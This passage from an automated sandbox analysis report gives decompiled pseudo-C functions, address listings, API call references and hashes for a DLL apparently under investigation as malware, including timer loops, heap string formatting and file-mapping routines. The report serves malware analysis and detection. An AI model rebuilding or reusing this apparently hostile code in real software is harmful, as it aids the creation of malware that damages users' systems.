				_t86 =  *0xdea32c; // 0x3d195b0
				if(_t86 != 0) {
					_t132 =  *0xdea2d4; // 0x2f2d5a8
					_t20 = _t132 + 0xdeb676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xdea37c; // 0x3d19630
				_t88 = E00DE2885(0xdea00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0xdea290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xdea290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xdea290, _t167, _v12);
						goto L28;
					}
					E00DE2DD0(GetTickCount());
					_t95 =  *0xdea37c; // 0x3d19630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xdea37c; // 0x3d19630
					__imp__(_t99 + 0x40);
					_t101 =  *0xdea37c; // 0x3d19630
					_t102 = E00DE624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xdea290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xde92ac);
					_push(_t163);
					_t107 = E00DE21C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xdea290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00DE4AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00DE1492();
						L24:
						HeapFree( *0xdea290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00DE26C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E00DE161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00DE50CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00DE580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00DE50CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00de46d1
0x00de46d1
0x00de46d1
0x00de46da
0x00de46df
0x00de46e6
0x00de46e8
0x00de46e8
0x00de46f5
0x00de4700
0x00de4703
0x00de470e
0x00de4711
0x00de4716
0x00de4719
0x00de471e
0x00de4721
0x00de472d
0x00de473a
0x00de473c
0x00de4742
0x00de4747
0x00de4752
0x00de4754
0x00de4757
0x00de475d
0x00de475f
0x00de4767
0x00de4772
0x00de4774
0x00de4777
0x00de4777
0x00de4779
0x00de4780
0x00de4785
0x00de4792
0x00de4794
0x00de4799
0x00de47a1
0x00de47a4
0x00de47aa
0x00de47b5
0x00de47b7
0x00de47bc
0x00de47c1
0x00de47c4
0x00de47c9
0x00de47d4
0x00de47d6
0x00de47d9
0x00de47d9
0x00de47db
0x00de47e2
0x00de47e5
0x00de47ea
0x00de47f4
0x00de47f6
0x00de47f6
0x00de47f9
0x00de4807
0x00de480c
0x00de4810
0x00de4813
0x00de49dd
0x00de49e5
0x00de49f2
0x00de4819
0x00de4825
0x00de482d
0x00de4830
0x00de49cd
0x00de49d7
0x00000000
0x00de49d7
0x00de483c
0x00de4841
0x00de484a
0x00de485b
0x00de485f
0x00de4868
0x00de486e
0x00de4876
0x00de487b
0x00de4882
0x00de488b
0x00de4891
0x00de49bd
0x00de49c7
0x00000000
0x00de49c7
0x00de489d
0x00de48a3
0x00de48a4
0x00de48ab
0x00de48ae
0x00de49af
0x00de49b7
0x00000000
0x00de49b7
0x00de48b7
0x00de48bd
0x00de48c6
0x00de48cf
0x00de48da
0x00de48e1
0x00de48e4
0x00de49f5
0x00de4997
0x00de4997
0x00de499c
0x00de49a7
0x00de49ad
0x00000000
0x00de49ad
0x00de48ee
0x00de48f5
0x00de48f8
0x00de48fd
0x00de4908
0x00de490d
0x00de4910
0x00de4916
0x00de491c
0x00de4922
0x00de4925
0x00de492b
0x00de492e
0x00de4933
0x00de4937
0x00de4937
0x00de4943
0x00de494f
0x00de4953
0x00de4955
0x00de495a
0x00de495c
0x00de4961
0x00de4966
0x00de4973
0x00de497b
0x00de497e
0x00de497e
0x00de495a
0x00000000
0x00de4945
0x00de4949
0x00de4980
0x00de4983
0x00de498c
0x00000000
0x00000000
0x00000000
0x00000000
0x00de498c
0x00de494b
0x00000000
0x00de494b
0x00de4943

APIs

GetTickCount.KERNEL32 ref: 00DE46E8
wsprintfA.USER32 ref: 00DE4735
wsprintfA.USER32 ref: 00DE4752
wsprintfA.USER32 ref: 00DE4772
wsprintfA.USER32 ref: 00DE4790
wsprintfA.USER32 ref: 00DE47B3
wsprintfA.USER32 ref: 00DE47D4
wsprintfA.USER32 ref: 00DE47F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DE4825
GetTickCount.KERNEL32 ref: 00DE4836
RtlEnterCriticalSection.NTDLL(03D195F0), ref: 00DE484A
RtlLeaveCriticalSection.NTDLL(03D195F0), ref: 00DE4868

Part of subcall function 00DE624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6278
Part of subcall function 00DE624D: lstrlen.KERNEL32(00000000,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE6280
Part of subcall function 00DE624D: strcpy.NTDLL ref: 00DE6297
Part of subcall function 00DE624D: lstrcat.KERNEL32(00000000,00000000), ref: 00DE62A2
Part of subcall function 00DE624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE62BF

StrTrimA.SHLWAPI(00000000,00DE92AC,?,03D19630), ref: 00DE489D

Part of subcall function 00DE21C1: lstrlen.KERNEL32(03D187FA,00000000,00000000,00000000,00DE7100,00000000), ref: 00DE21D1
Part of subcall function 00DE21C1: lstrlen.KERNEL32(?), ref: 00DE21D9
Part of subcall function 00DE21C1: lstrcpy.KERNEL32(00000000,03D187FA), ref: 00DE21ED
Part of subcall function 00DE21C1: lstrcat.KERNEL32(00000000,?), ref: 00DE21F8

lstrcpy.KERNEL32(00000000,?), ref: 00DE48BD
lstrcat.KERNEL32(00000000,?), ref: 00DE48CF
lstrcat.KERNEL32(00000000,00000000), ref: 00DE48D5

Part of subcall function 00DE4AA6: lstrlen.KERNEL32(?,00000000,03D19C98,745EC740,00DE13D0,03D19E9D,00DE55DE,00DE55DE,?,00DE55DE,?,63699BC3,E8FA7DD7,00000000), ref: 00DE4AAD
Part of subcall function 00DE4AA6: mbstowcs.NTDLL ref: 00DE4AD6
Part of subcall function 00DE4AA6: memset.NTDLL ref: 00DE4AE8

wcstombs.NTDLL ref: 00DE4966

Part of subcall function 00DE161A: SysAllocString.OLEAUT32(00000000), ref: 00DE165B

Part of subcall function 00DE50CA: RtlFreeHeap.NTDLL(00000000,00000000,00DE4239,00000000,00000001,?,00000000,?,?,?,00DE6B8D,00000000,?,00000001), ref: 00DE50D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 00DE49A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DE49B7
HeapFree.KERNEL32(00000000,00000000,?,03D19630), ref: 00DE49C7
HeapFree.KERNEL32(00000000,?), ref: 00DE49D7
HeapFree.KERNEL32(00000000,?), ref: 00DE49E5

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 972889839-0
Opcode ID: d98b51cc09b6e6bf63c556702d8e5d0f216013c4c1f7fd193d3a052588f5f276
Instruction ID: 3c37b198463a6cb22ad1d66ca9b5a56e27d0f621b11ecd112ccdc297d9814778
Opcode Fuzzy Hash: d98b51cc09b6e6bf63c556702d8e5d0f216013c4c1f7fd193d3a052588f5f276
Instruction Fuzzy Hash: AEA15B7150128AAFCB11FFA9DC89EAB3BA9FF48350B154425F908DB361D735A910CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE2022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00DE2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xdea298);
					_v20 = 0;
					_v16 = 0;
					L00DE7D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xdea2c4; // 0x234
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xdea2a4 = 5;
						} else {
							_t69 = E00DE1AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xdea2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00DE5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00DE3032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xdea29c);
							goto L21;
						} else {
							__eflags =  *0xdea2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00DE1492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xdea2a0);
								L21:
								L00DE7D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xdea290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00de2022
0x00de2034
0x00de2037
0x00de2043
0x00de204b
0x00de204e
0x00de21b4
0x00de2054
0x00de2054
0x00de2056
0x00de205b
0x00de205c
0x00de2062
0x00de2065
0x00de2068
0x00de2076
0x00de2081
0x00de2084
0x00de2086
0x00de2093
0x00de209d
0x00de20a1
0x00de20a4
0x00de20a9
0x00de20b4
0x00de20b4
0x00de20ab
0x00de20ab
0x00de20b2
0x00000000
0x00000000
0x00de20b2
0x00de20be
0x00000000
0x00de20c1
0x00de20c5
0x00de20d0
0x00de20d0
0x00de20d7
0x00de20dc
0x00de20e3
0x00de20ec
0x00de20f2
0x00de20f5
0x00de20fc
0x00de20ff
0x00000000
0x00000000
0x00de2101
0x00de2104
0x00de2107
0x00de210a
0x00000000
0x00de210c
0x00de211b
0x00de211b
0x00000000
0x00de2149
0x00de2149
0x00de214e
0x00de216d
0x00de216f
0x00de2174
0x00de2175
0x00000000
0x00de2150
0x00de2150
0x00de2156
0x00000000
0x00de2158
0x00de2158
0x00de215d
0x00de215f
0x00de2164
0x00de2165
0x00de217b
0x00de217b
0x00de2183
0x00de218e
0x00de2191
0x00de219c
0x00de219e
0x00de21a0
0x00de21a3
0x00000000
0x00de21a9
0x00000000
0x00de21a9
0x00de21a3
0x00de2156
0x00000000
0x00de214e
0x00de211e
0x00de2120
0x00de2123
0x00de2124
0x00de2124
0x00de2128
0x00de2132
0x00de2132
0x00de2138
0x00de213b
0x00de213b
0x00de2141
0x00de2141
0x00de21be
0x00000000

APIs

memset.NTDLL ref: 00DE2037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DE2043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DE2068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00DE2084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DE209D
HeapFree.KERNEL32(00000000,00000000), ref: 00DE2132
CloseHandle.KERNEL32(?), ref: 00DE2141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DE217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00DE560C), ref: 00DE2191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DE219C

Part of subcall function 00DE1AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03D19308,00000000,?,73BCF710,00000000,73BCF730), ref: 00DE1B07
Part of subcall function 00DE1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03D19340,?,00000000,30314549,00000014,004F0053,03D192FC), ref: 00DE1BA4
Part of subcall function 00DE1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DE20B0), ref: 00DE1BB6

GetLastError.KERNEL32 ref: 00DE21AE

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: e9d0d08c9f26bf691426e6ff9745ddf84a3fbf979dd6874fef8f4a97646e5926
Instruction ID: 1705637ac0f27090ea07d00c4f18e1f752a0096bbc3218a496980b1a6d98b24a
Opcode Fuzzy Hash: e9d0d08c9f26bf691426e6ff9745ddf84a3fbf979dd6874fef8f4a97646e5926
Instruction Fuzzy Hash: 015158718012A9AEDF11AF96DC859EEBFBCEF09320F244116F614F6290D7719A40CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6D471C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6D471C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D471F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6D4718AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D471ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D4713D1(E6D4714E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D47134F(_t45,  &_v48) != 0) {
					 *0x6d4741b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6d4741b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D471B58(_t50 + _t15);
				 *0x6d4741b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6D47142F(_t44);
					goto L11;
				}
			}

0x6d471c89
0x6d471c92
0x6d471c96
0x6d471d9e
0x6d471da4
0x00000000
0x00000000
0x00000000
0x6d471c9c
0x6d471c9c
0x6d471ca1
0x6d471ca7
0x6d471cb6
0x6d471cb7
0x6d471cba
0x6d471cbd
0x6d471cc6
0x6d471cca
0x6d471cd0
0x6d471cd4
0x6d471cdb
0x00000000
0x00000000
0x6d471ce1
0x6d471ce8
0x6d471cec
0x6d471d8f
0x6d471d8f
0x6d471d96
0x6d471d98
0x6d471d98
0x00000000
0x6d471d96
0x6d471cf5
0x6d471d48
0x6d471d48
0x6d471d59
0x6d471d5d
0x6d471d8b
0x6d471d5f
0x6d471d62
0x6d471d6a
0x6d471d6e
0x6d471d76
0x6d471d76
0x6d471d7d
0x6d471d7d
0x00000000
0x6d471d5d
0x6d471d03
0x6d471d42
0x00000000
0x6d471d42
0x6d471d05
0x6d471d09
0x6d471d12
0x6d471d14
0x6d471d18
0x6d471d3a
0x6d471d3a
0x00000000
0x6d471d3a
0x6d471d1a
0x6d471d1f
0x6d471d26
0x6d471d2b
0x00000000
0x6d471d2d
0x6d471d30
0x6d471d33
0x00000000
0x6d471d33

APIs

Part of subcall function 6D471F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D471C8E,73B763F0,00000000), ref: 6D471F1F
Part of subcall function 6D471F10: GetVersion.KERNEL32 ref: 6D471F2E
Part of subcall function 6D471F10: GetCurrentProcessId.KERNEL32 ref: 6D471F3D
Part of subcall function 6D471F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D471F56

GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D471CA1
SwitchToThread.KERNEL32 ref: 6D471CA7

Part of subcall function 6D4718AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D471903
Part of subcall function 6D4718AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D4719C9

Sleep.KERNELBASE(00000000,00000000), ref: 6D471CCA
GetLongPathNameW.KERNELBASE ref: 6D471D12
GetLongPathNameW.KERNELBASE ref: 6D471D30
WaitForSingleObject.KERNEL32(00000000,000000FF,6D4714E8,?,00000000), ref: 6D471D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D471D76
CloseHandle.KERNEL32(00000000), ref: 6D471D7D
GetLastError.KERNEL32(6D4714E8,?,00000000), ref: 6D471D85
GetLastError.KERNEL32 ref: 6D471D98

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 078f35e6aa4f0c773c6479cec4755e7c7e638c2539a53bfaa105a67b46b5f591
Instruction ID: deeacf948393f32ef8b08fb0b07ee9736388705170b6d92d2eac3120d334beac
Opcode Fuzzy Hash: 078f35e6aa4f0c773c6479cec4755e7c7e638c2539a53bfaa105a67b46b5f591
Instruction Fuzzy Hash: 5B3165719087929BC721EF758858EEF77FCFE86754B11191AF964D2240E730DD048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE6384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00DE6384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00DE7D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xdea2d4; // 0x2f2d5a8
				_t5 = _t13 + 0xdeb8a2; // 0x3d18e4a
				_t6 = _t13 + 0xdeb57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00DE7A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0xdea2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00de6384
0x00de638c
0x00de6390
0x00de6396
0x00de639b
0x00de63a0
0x00de63a3
0x00de63a6
0x00de63ab
0x00de63ac
0x00de63af
0x00de63b4
0x00de63bb
0x00de63c5
0x00de63c7
0x00de63c8
0x00de63cb
0x00de63e7
0x00de63ed
0x00de63f1
0x00de643f
0x00de63f3
0x00de6400
0x00de6410
0x00de6418
0x00de642a
0x00de642e
0x00000000
0x00000000
0x00de641a
0x00de641d
0x00de6422
0x00de6424
0x00de6424
0x00de6402
0x00de6404
0x00de6430
0x00de6431
0x00de6431
0x00de6400
0x00de6446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00DE5488,?,00000001,?), ref: 00DE6390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DE63A6
_snwprintf.NTDLL ref: 00DE63CB
CreateFileMappingW.KERNELBASE(000000FF,00DEA2F8,00000004,00000000,00001000,?), ref: 00DE63E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE5488,?), ref: 00DE63F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DE6410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE5488), ref: 00DE6431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DE5488,?), ref: 00DE6439

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: c799a98cf22d69b0714bc3970456aa36473f5df6c0a6f7ff307ef847bb43bda3
Instruction ID: 528f8b2cf31193adcffe43639c02e305417ac196e861bcbbb5006325a3477e95
Opcode Fuzzy Hash: c799a98cf22d69b0714bc3970456aa36473f5df6c0a6f7ff307ef847bb43bda3
Instruction Fuzzy Hash: E921F372641294FBC721FFA9DC45F9EB7A8AB54790F244021FA05EB2D0DA70DA008B71

Uniqueness

Uniqueness Score: -1.00%

Function 00DE53F2, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00DE53F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00DE58F8();
				if(_t27 != 0) {
					_t77 =  *0xdea2b4; // 0x2000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xdea2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xdea148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00DE696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xdea2d4; // 0x2f2d5a8
					_push(0xdea2fc);
					_push(1);
					_t7 = _t32 + 0xdeb5ad; // 0x4d283a53
					 *0xdea2f8 = 0xc;
					 *0xdea300 = 0;
					L00DE4AF8();
					_t36 = E00DE6384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00DE4454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00DE6837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xdea2d4; // 0x2f2d5a8
								_t18 = _t64 + 0xdeb84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xdea32c = _t87;
						}
						_t38 = E00DE60E1();
						 *0xdea2c8 =  *0xdea2c8 ^ 0xe8fa7dd7;
						 *0xdea31c = _t38;
						_t39 = E00DE6837(0x60);
						__eflags = _t39;
						 *0xdea37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xdea37c; // 0x3d19630
